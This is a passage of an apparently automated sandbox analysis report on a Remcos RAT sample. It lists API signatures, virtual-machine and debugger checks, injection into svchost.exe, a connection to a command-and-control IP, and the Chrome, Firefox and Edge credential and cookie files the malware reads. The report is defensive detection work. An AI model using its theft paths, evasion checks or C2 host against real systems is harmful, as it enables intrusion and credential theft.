                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,12_2_0041C322
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,12_2_0040C388
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,12_2_004096A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,12_2_00408847
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_00407877 FindFirstFileW,FindNextFileW,12_2_00407877
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0044E8F9 FindFirstFileExA,12_2_0044E8F9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,12_2_0040BB6B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,12_2_00419B86
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,12_2_0040BD72
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,5_2_00407CD2
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00C74AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00C74AFE
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
                  Source: Amcache.hve.8.drBinary or memory string: VMware
                  Source: Amcache.hve.8.drBinary or memory string: VMware Virtual USB Mouse
                  Source: Amcache.hve.8.drBinary or memory string: vmci.syshbin
                  Source: Amcache.hve.8.drBinary or memory string: VMware, Inc.
                  Source: Amcache.hve.8.drBinary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.8.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.8.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.8.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.8.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.8.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: Amcache.hve.8.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.8.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: svchost.exe, 00000005.00000002.2348445947.0000000003412000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: Amcache.hve.8.drBinary or memory string: vmci.sys
                  Source: Amcache.hve.8.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                  Source: Amcache.hve.8.drBinary or memory string: vmci.syshbin`
                  Source: Amcache.hve.8.drBinary or memory string: \driver\vmci,\driver\pci
                  Source: Amcache.hve.8.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.8.drBinary or memory string: VMware20,1
                  Source: Amcache.hve.8.drBinary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.8.drBinary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.8.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: Amcache.hve.8.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: Amcache.hve.8.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: Amcache.hve.8.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.8.drBinary or memory string: VMware PCI VMCI Bus Device
                  Source: Amcache.hve.8.drBinary or memory string: VMware VMCI Bus Device
                  Source: Amcache.hve.8.drBinary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.8.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: Amcache.hve.8.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: C:\Users\user\Desktop\jv4ri.exeAPI call chain: ExitProcess graph end nodegraph_0-99049
                  Source: C:\Users\user\Desktop\jv4ri.exeAPI call chain: ExitProcess graph end nodegraph_0-99123
                  Source: C:\Users\user\Desktop\jv4ri.exeAPI call chain: ExitProcess graph end nodegraph_0-99235
                  Source: C:\Users\user\AppData\Local\directory\name.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Users\user\AppData\Local\directory\name.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Windows\SysWOW64\svchost.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CE41FD BlockInput,0_2_00CE41FD
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00C73B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00C73B4C
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CA5CCC RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,0_2_00CA5CCC
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00DBC0B0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,0_2_00DBC0B0
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_03143540 mov eax, dword ptr fs:[00000030h]0_2_03143540
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_031434E0 mov eax, dword ptr fs:[00000030h]0_2_031434E0
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_03141E70 mov eax, dword ptr fs:[00000030h]0_2_03141E70
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_03F73540 mov eax, dword ptr fs:[00000030h]2_2_03F73540
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_03F734E0 mov eax, dword ptr fs:[00000030h]2_2_03F734E0
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_03F71E70 mov eax, dword ptr fs:[00000030h]2_2_03F71E70
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 4_2_00D33540 mov eax, dword ptr fs:[00000030h]4_2_00D33540
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 4_2_00D31E70 mov eax, dword ptr fs:[00000030h]4_2_00D31E70
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 4_2_00D334E0 mov eax, dword ptr fs:[00000030h]4_2_00D334E0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00443355 mov eax, dword ptr fs:[00000030h]5_2_00443355
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_032634E0 mov eax, dword ptr fs:[00000030h]11_2_032634E0
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_03261E70 mov eax, dword ptr fs:[00000030h]11_2_03261E70
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_03263540 mov eax, dword ptr fs:[00000030h]11_2_03263540
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_00443355 mov eax, dword ptr fs:[00000030h]12_2_00443355
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CC81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00CC81F7
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00C9A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00C9A395
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00C9A364 SetUnhandledExceptionFilter,0_2_00C9A364
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0004A364 SetUnhandledExceptionFilter,2_2_0004A364
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0004A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0004A395
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_0043503C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00434A8A
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_0043BB71
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00434BD8 SetUnhandledExceptionFilter,5_2_00434BD8
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_0043503C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00434A8A
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_0043BB71
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_00434BD8 SetUnhandledExceptionFilter,12_2_00434BD8

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  System process connects to network (likely due to code injection or exploit)
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 45.95.169.104 2404Jump to behavior
                  Maps a DLL or memory area into another process
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                  Writes to foreign memory regions
                  Source: C:\Users\user\AppData\Local\directory\name.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3000008Jump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2D88008Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe5_2_00412132
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe12_2_00412132
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CC8C93 LogonUserW,0_2_00CC8C93
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00C73B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00C73B4C
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00C74A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00C74A35
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CD4EC9 mouse_event,0_2_00CD4EC9
                  Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\jv4ri.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\directory\name.exe"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\directory\name.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CC81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00CC81F7
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CD4C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00CD4C03
                  Source: jv4ri.exe, 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmp, name.exe, 00000002.00000002.2039583863.00000000000D5000.00000040.00000001.01000000.00000004.sdmp, name.exe, 00000004.00000002.2054778566.00000000000D5000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                  Source: svchost.exe, 00000005.00000002.2348445947.0000000003412000.00000004.00000020.00020000.00000000.sdmp, logs.dat.5.drBinary or memory string: [2024/09/06 15:56:57 Program Manager]
                  Source: jv4ri.exe, name.exeBinary or memory string: Shell_TrayWnd
                  Source: svchost.exe, 00000005.00000002.2348481451.0000000003436000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager+
                  Source: svchost.exe, 00000005.00000002.2348445947.0000000003412000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00C9886B cpuid 0_2_00C9886B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoA,5_2_0040F90C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: EnumSystemLocalesW,5_2_0045201B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: EnumSystemLocalesW,5_2_004520B6
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,5_2_00452143
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoW,5_2_00452393
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: EnumSystemLocalesW,5_2_00448484
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,5_2_004524BC
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoW,5_2_004525C3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,5_2_00452690
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoW,5_2_0044896D
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,5_2_00451D58
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: EnumSystemLocalesW,5_2_00451FD0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: EnumSystemLocalesW,12_2_0045201B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: EnumSystemLocalesW,12_2_004520B6
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,12_2_00452143
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoW,12_2_00452393
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: EnumSystemLocalesW,12_2_00448484
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,12_2_004524BC
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoW,12_2_004525C3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,12_2_00452690
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoW,12_2_0044896D
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoA,12_2_0040F90C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,12_2_00451D58
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: EnumSystemLocalesW,12_2_00451FD0
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CA50D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00CA50D7
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CB2230 GetUserNameW,0_2_00CB2230
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CA418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00CA418A
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00C74AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00C74AFE
                  Source: C:\Users\user\Desktop\jv4ri.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: Amcache.hve.8.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.8.drBinary or memory string: msmpeng.exe
                  Source: Amcache.hve.8.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Amcache.hve.8.drBinary or memory string: MsMpEng.exe

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 12.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.name.exe.36c0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.name.exe.3f80000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.name.exe.36b0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.name.exe.36b0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.name.exe.36c0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.name.exe.3f80000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.2348733537.000000000522F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.2347910354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.2348427875.0000000003400000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.2055858818.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.2348445947.0000000003412000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.2181376722.0000000003000000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.2181096608.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.2040296471.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2182098787.00000000036C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: name.exe PID: 6176, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: name.exe PID: 6364, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 3712, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: name.exe PID: 4160, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6548, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                  Contains functionality to steal Chrome passwords or cookies
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data5_2_0040BA4D
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data12_2_0040BA4D
                  Contains functionality to steal Firefox passwords or cookies
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\5_2_0040BB6B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: \key3.db5_2_0040BB6B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\12_2_0040BB6B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: \key3.db12_2_0040BB6B
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                  Source: name.exeBinary or memory string: WIN_81
                  Source: name.exeBinary or memory string: WIN_XP
                  Source: name.exeBinary or memory string: WIN_XPe
                  Source: name.exeBinary or memory string: WIN_VISTA
                  Source: name.exeBinary or memory string: WIN_7
                  Source: name.exeBinary or memory string: WIN_8
                  Source: name.exe, 0000000B.00000002.2181378905.00000000000D5000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                  Remote Access Functionality

                  barindex
                  Detected Remcos RAT
                  Source: C:\Windows\SysWOW64\svchost.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-S3AD48Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-S3AD48Jump to behavior
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 12.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.name.exe.36c0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.name.exe.3f80000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.name.exe.36b0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.name.exe.36b0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.name.exe.36c0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.name.exe.3f80000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.2348733537.000000000522F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.2347910354.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.2348427875.0000000003400000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.2055858818.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.2348445947.0000000003412000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.2181376722.0000000003000000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.2181096608.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.2040296471.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2182098787.00000000036C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: name.exe PID: 6176, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: name.exe PID: 6364, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 3712, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: name.exe PID: 4160, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6548, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: cmd.exe5_2_0040569A
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: cmd.exe12_2_0040569A
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CE6596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00CE6596
                  Source: C:\Users\user\Desktop\jv4ri.exeCode function: 0_2_00CE6A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00CE6A5A
